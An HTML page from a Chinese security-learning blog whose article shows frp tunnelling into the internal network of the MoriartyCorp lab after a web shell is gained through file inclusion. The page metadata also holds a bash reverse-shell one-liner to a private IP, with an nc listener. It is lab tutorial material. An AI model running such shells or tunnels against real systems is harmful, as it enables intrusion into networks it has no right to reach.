<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer" />
  <title>内网穿透 | 个人博客</title>
  <meta name="keywords" content=" 内网 , 反向代理 , 内网穿透 ">
  <meta name="description" content="内网穿透 | 个人博客">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="1 将meterpreter获得的权限，反弹到kail上。1.1 kaill监听端口1nc -nvlp 4444 &#x2F;&#x2F;nc是监听软件，4444是监听端口   1.2 meterpreter获取权限后，将权限反弹出来1bash -c &#x27;exec bash -i &amp;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.2.96&#x2F;4444 &lt;&amp;1&#x27; &#x2F;&#x2F;将权限反弹到指定ip">
<meta property="og:type" content="article">
<meta property="og:title" content="linux提权">
<meta property="og:url" content="http://example.com/2024/10/11/1%20linux%E7%BB%B4%E6%9D%83%E5%92%8C%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="个人博客">
<meta property="og:description" content="1 将meterpreter获得的权限，反弹到kail上。1.1 kaill监听端口1nc -nvlp 4444 &#x2F;&#x2F;nc是监听软件，4444是监听端口   1.2 meterpreter获取权限后，将权限反弹出来1bash -c &#x27;exec bash -i &amp;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.2.96&#x2F;4444 &lt;&amp;1&#x27; &#x2F;&#x2F;将权限反弹到指定ip">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584076577-8dc5a9af-4a47-4ab9-b2d0-cbd67a4a686d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584181405-f6228c06-0936-47c3-904a-4707b55ced4d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584268726-aee52496-2f22-412a-8d9e-61f9e4e09560.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584463153-c472d14f-6d2e-4b8d-8174-a369c8043590.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584639753-87608500-4599-4b9f-9ea3-a684498c3a6d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722585283689-67ed8977-1087-471d-ac49-dbbb76fa842e.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584836795-b45026c4-9849-4082-a2cf-b7fefe17e3fa.png">
<meta property="article:published_time" content="2024-10-11T02:34:02.000Z">
<meta property="article:modified_time" content="2024-10-11T03:39:20.574Z">
<meta property="article:author" content="komobyte">
<meta property="article:tag" content="提权">
<meta property="article:tag" content="维权">
<meta property="article:tag" content="linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584076577-8dc5a9af-4a47-4ab9-b2d0-cbd67a4a686d.png">


<link rel="icon" href="/img/favicon.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpeg"/>
</a>
<div class="author">
    <span>komobyte</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="facebook"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-facebook"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="reddit"
               href="https://www.reddit.com/user/yelog/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-reddit"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="weibo"
               href="http://weibo.com/u/2307534817"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-weibo"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="jianshu"
               href="https://www.jianshu.com/u/ff56736de7cf"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-jianshu"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/people/jaytp/activities"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:jaytp@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=872336115&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="kugou"
               href="https://www.kugou.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-kugou"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="neteasemusic"
               href="https://music.163.com/#/user/home?id=88151013"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-neteasemusic"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(15)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="内网">
            
            内网
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="网安学习">
            
            网安学习
            <small>(10)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="15">
<input type="hidden" id="yelog_site_word_count" value="9.5k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://komobyte.github.io/">komonyte</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>报错注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>布尔注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>反向代理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>工具</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>谷歌</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>联合注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网穿透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>时间</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>提权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>维权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息收集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息搜集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CVE-2020-0796</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>union</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/10/11/1%20linux%E7%BB%B4%E6%9D%83%E5%92%8C%E6%8F%90%E6%9D%83/"
           data-tag="提权,维权,linux"
           data-author="" >
            <span class="post-title" title="linux提权">linux提权</span>
            <span class="post-date" title="2024-10-11 10:34:02">2024/10/11</span>
        </a>
        
        
        <a  class="全部文章 内网 "
           href="/2024/08/14/%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%EF%BC%88%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%EF%BC%89/"
           data-tag="内网,反向代理,内网穿透"
           data-author="" >
            <span class="post-title" title="内网穿透">内网穿透</span>
            <span class="post-date" title="2024-08-14 20:34:02">2024/08/14</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/3%20MySQL%E5%9F%BA%E7%A1%80/"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="MySQL基础">MySQL基础</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/1.%20sql%E6%B3%A8%E5%85%A5%E5%85%A5%E9%97%A8/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="sql注入入门">sql注入入门</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/1%20%E8%B0%B7%E6%AD%8C%E8%AF%AD%E6%B3%95/"
           data-tag="谷歌,信息搜集"
           data-author="" >
            <span class="post-title" title="谷歌语法">谷歌语法</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/2%20%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E5%B7%A5%E5%85%B7/"
           data-tag="信息收集,工具"
           data-author="" >
            <span class="post-title" title="信息收集工具">信息收集工具</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/2%20%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5/"
           data-tag="SQL注入,联合注入,union"
           data-author="" >
            <span class="post-title" title="联合注入">联合注入</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/3%20%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/"
           data-tag="SQL注入,报错注入"
           data-author="" >
            <span class="post-title" title="报错注入">报错注入</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/4.%20%E7%9B%B2%E6%B3%A8/"
           data-tag="SQL注入,布尔注入,时间,盲注"
           data-author="" >
            <span class="post-title" title="盲注">盲注</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/15/2%20PHP%E5%9F%BA%E7%A1%80/"
           data-tag="PHP"
           data-author="" >
            <span class="post-title" title="PHP基础">PHP基础</span>
            <span class="post-date" title="2024-07-15 08:55:02">2024/07/15</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/12/0.2%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91(CVE-2020-0796)/"
           data-tag="CVE-2020-0796,漏洞"
           data-author="" >
            <span class="post-title" title="永恒之黑漏洞利用">永恒之黑漏洞利用</span>
            <span class="post-date" title="2024-07-12 20:18:48">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.6%E9%92%93%E9%B1%BC%E5%92%8C%E8%87%AA%E8%A7%A3%E5%8E%8B%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC%E7%9A%84%E7%BB%BC%E5%90%88/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="钓鱼和自解压捆绑木马综合">钓鱼和自解压捆绑木马综合</span>
            <span class="post-date" title="2024-07-11 19:23:16">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.5%E8%87%AA%E8%A7%A3%E5%8E%8B%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="自解压捆绑木马">自解压捆绑木马</span>
            <span class="post-date" title="2024-07-11 19:23:06">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.4flash%E9%92%93%E9%B1%BC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="flash钓鱼">flash钓鱼</span>
            <span class="post-date" title="2024-07-11 19:22:55">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/03%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E5%8F%8Anamp%E7%9A%84%E4%BD%BF%E7%94%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="计算机网络基础及hexo使用">计算机网络基础及hexo使用</span>
            <span class="post-date" title="2024-07-11 09:35:30">2024/07/11</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-反向代理（内网穿透）" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">内网穿透</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="内网">内网</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color3">内网</a>
            
            <a class="color5">反向代理</a>
            
            <a class="color5">内网穿透</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2024-08-14 20:06:34'>2024-08-14 20:34</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:524</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E4%BB%80%E4%B9%88%E6%98%AF%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86"><span class="toc-text">1 什么是反向代理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%96%B9%E5%90%91%E4%BB%A3%E7%90%86%E5%B7%A5%E5%85%B7-frp"><span class="toc-text">2 方向代理工具-frp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-frp-%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86"><span class="toc-text">3 frp-工作原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E9%9D%B6%E5%9C%BA-MoriartyCorp"><span class="toc-text">4 靶场-MoriartyCorp</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#4-1-%E9%A6%96%E5%85%88%E6%8B%BF%E5%88%B0%E7%BD%91%E7%AB%99%E7%9A%84shell%EF%BC%8C%E9%80%9A%E8%BF%87%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-text">4.1 首先拿到网站的shell，通过文件包含漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-2-%E9%A6%96%E5%85%88%E9%85%8D%E7%BD%AEfrp%E7%9A%84%E5%AE%A2%E6%88%B7%E7%AB%AF"><span class="toc-text">4.2 首先配置frp的客户端</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-3-%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E6%96%87%E4%BB%B6%E9%85%8D%E7%BD%AE"><span class="toc-text">4.3 服务器端文件配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-4-%E5%B0%86%E9%85%8D%E7%BD%AE%E5%A5%BD%E7%9A%84%E6%96%87%E4%BB%B6%E5%92%8Cfrp%E7%9A%84%E5%AE%A2%E6%88%B7%E7%AB%AF%E9%80%9A%E8%BF%87%E8%9A%81%E5%89%91%E7%9B%B4%E6%8E%A5%E4%BC%A0%E5%85%A5tmp%E7%9B%AE%E5%BD%95"><span class="toc-text">4.4 将配置好的文件和frp的客户端通过蚁剑直接传入tmp目录</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-5-%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%BF%90%E8%A1%8C"><span class="toc-text">4.5 服务器端运行</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-6-%E4%B8%BA%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%B7%BB%E5%8A%A0%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%9D%83%E9%99%90-%E5%B9%B6%E8%BF%90%E8%A1%8C"><span class="toc-text">4.6 为客户端添加可执行权限,并运行</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-7-%E5%BD%93%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E6%88%90%E5%8A%9F%E5%90%8E-%EF%BC%8C%E6%B5%8F%E8%A7%88%E5%99%A8%E6%8C%82%E4%BB%A3%E7%90%86-%E8%AE%BF%E9%97%AE%E5%86%85%E7%BD%91"><span class="toc-text">4.7 当反向代理成功后 ，浏览器挂代理,访问内网</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="1-什么是反向代理"><a href="#1-什么是反向代理" class="headerlink" title="1 什么是反向代理"></a>1 什么是反向代理</h3><p>通过反向代理访问内网资源</p>
<h3 id="2-方向代理工具-frp"><a href="#2-方向代理工具-frp" class="headerlink" title="2 方向代理工具-frp"></a>2 方向代理工具-frp</h3><p>frp 是一款高性能的<code>反向代理</code>应用，专注于<code>内网穿透</code>。它支持多种协议，包括 TCP、UDP、HTTP、HTTPS 等，并且具备 P2P 通信功能。使用 frp，您可以安全、便捷地将内网服务暴露到公网，通过拥有公网 IP 的节点进行<code>中转</code>。</p>
<h3 id="3-frp-工作原理"><a href="#3-frp-工作原理" class="headerlink" title="3 frp-工作原理"></a>3 frp-工作原理</h3><p>frp 主要由两个组件组成：客户端(frpc) 和 服务端(frps)。通常情况下，服务端部署在具有公网 IP 地址的机器上，而客户端部署在需要穿透的内网服务所在的机器上。<br>由于内网服务缺乏公网 IP 地址，因此无法直接被非局域网内的用户访问。用户通过访问服务端的 frps，frp 负责根据请求的端口或其他信息将请求路由到相应的内网机器，从而实现通信。</p>
<h3 id="4-靶场-MoriartyCorp"><a href="#4-靶场-MoriartyCorp" class="headerlink" title="4 靶场-MoriartyCorp"></a>4 靶场-MoriartyCorp</h3><h4 id="4-1-首先拿到网站的shell，通过文件包含漏洞"><a href="#4-1-首先拿到网站的shell，通过文件包含漏洞" class="headerlink" title="4.1 首先拿到网站的shell，通过文件包含漏洞"></a>4.1 首先拿到网站的shell，通过文件包含漏洞</h4><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1723633607198-ccf1d460-d82a-4b0a-b5ba-c8e7b0a91938.png#averageHue=%23363635&clientId=ued4f7d65-a452-4&from=paste&height=241&id=u2f5495cf&originHeight=331&originWidth=1261&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=27585&status=done&style=none&taskId=u73a9f03e-5c4d-4b3f-87f1-2298ada027d&title=&width=917.0909090909091" alt="image.png"></p>
<h4 id="4-2-首先配置frp的客户端"><a href="#4-2-首先配置frp的客户端" class="headerlink" title="4.2 首先配置frp的客户端"></a>4.2 首先配置frp的客户端</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = <span class="number">192.168</span><span class="number">.56</span><span class="number">.3</span>			<span class="comment">//服务器端的地址</span></span><br><span class="line">server_port = <span class="number">21080</span>					<span class="comment">//s与c的通信端口，这个可以自行设置</span></span><br><span class="line">token = 1qaz<span class="meta">@QWE</span>					<span class="comment">//token的意思是“令牌”，是服务端生成的一串字符串，作为客户端进行请求的一个标识。</span></span><br><span class="line"></span><br><span class="line">[socks_proxy]</span><br><span class="line">type = tcp							<span class="comment">//指定连接协议</span></span><br><span class="line">remote_port = <span class="number">123</span>					<span class="comment">//指定文件传输端口</span></span><br><span class="line">plugin = socks5</span><br></pre></td></tr></table></figure>
<h4 id="4-3-服务器端文件配置"><a href="#4-3-服务器端文件配置" class="headerlink" title="4.3 服务器端文件配置"></a>4.3 服务器端文件配置</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">bind_port = <span class="number">21080</span>					<span class="comment">//连接端口</span></span><br><span class="line">bind_addr = <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>					<span class="comment">//监听0.0.0.0所有的都可以连接</span></span><br><span class="line">token = 1qaz<span class="meta">@QWE</span></span><br></pre></td></tr></table></figure>
<h4 id="4-4-将配置好的文件和frp的客户端通过蚁剑直接传入tmp目录"><a href="#4-4-将配置好的文件和frp的客户端通过蚁剑直接传入tmp目录" class="headerlink" title="4.4 将配置好的文件和frp的客户端通过蚁剑直接传入tmp目录"></a>4.4 将配置好的文件和frp的客户端通过蚁剑直接传入tmp目录</h4><h4 id="4-5-服务器端运行"><a href="#4-5-服务器端运行" class="headerlink" title="4.5 服务器端运行"></a>4.5 服务器端运行</h4><ul>
<li>找到当前路径，打开cmd，并执行<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\frps.exe -c </span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="4-6-为客户端添加可执行权限-并运行"><a href="#4-6-为客户端添加可执行权限-并运行" class="headerlink" title="4.6 为客户端添加可执行权限,并运行"></a>4.6 为客户端添加可执行权限,并运行</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod +x /tmp/frpc*				<span class="comment">//可执行权限</span></span><br><span class="line">/tmp/frpc -c /tmp/frpc.tonl 	<span class="comment">//后面指定配置文件</span></span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1723633012979-048af324-a695-42b3-8b44-bd29a5bec9e9.png?x-oss-process=image/format,webp#averageHue=%23040404&from=url&id=Cfzcg&originHeight=265&originWidth=581&originalType=binary&ratio=1.375&rotation=0&showTitle=false&status=done&style=none&title="></p>
<h4 id="4-7-当反向代理成功后-，浏览器挂代理-访问内网"><a href="#4-7-当反向代理成功后-，浏览器挂代理-访问内网" class="headerlink" title="4.7 当反向代理成功后 ，浏览器挂代理,访问内网"></a>4.7 当反向代理成功后 ，浏览器挂代理,访问内网</h4><ul>
<li>端口为信息传输端口</li>
</ul>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1723636039152-81cbe099-70fc-4005-8688-a0bf63a7fe29.png#averageHue=%23fbfbfb&clientId=u3a4e4ba6-ef7b-4&from=paste&height=551&id=u185aa7b7&originHeight=757&originWidth=1331&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=47904&status=done&style=none&taskId=u25b94401-a098-4975-8a27-9bdd3cc79a1&title=&width=968" alt="image.png"></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
